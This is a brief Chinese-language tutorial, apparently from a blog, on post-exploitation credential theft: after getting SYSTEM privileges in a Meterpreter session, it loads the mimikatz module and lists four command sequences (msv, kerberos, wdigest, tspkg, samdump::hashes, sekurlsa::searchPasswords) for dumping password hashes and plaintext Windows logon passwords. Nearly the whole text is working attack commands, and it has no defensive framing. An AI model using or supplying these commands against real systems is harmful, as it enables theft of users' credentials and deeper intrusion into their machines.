進去meterpreter後getuid一下
這獲得系統管理員權限
開始
加載mimikatz模塊
load mimikatz
加載成功.
第一種方法:
獲取登錄密碼的hash值
msv
上面已經是得到hash值了. 下面算明文密碼.
獲取明文密碼
kerberos
look...拿到登錄的明文密碼了.
第二種方法:
使用另一種方式獲取哈希值
mimikatz_command -f samdump::hashes
根據上面的方式獲取明文密碼
mimikatz_command -f sekurlsa::searchPasswords
第三種方法:
Wdigest命令
這個命令呢, 沒有上面的複雜,加載模塊後直接調用這個wdigest.
wdigest
第四種方法:
tspkg命令
tspkg
總結
一、
load mimikatz #加載mimikatz
msv #獲取hash值
kerberos #獲取明文
二、
load mimikatz #加載mimikatz
wdigest #獲取系統賬戶信息
三、
load mimikatz #加載mimikatz
tspkg #獲取系統賬戶信息
四、
load mimikatz #加載mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords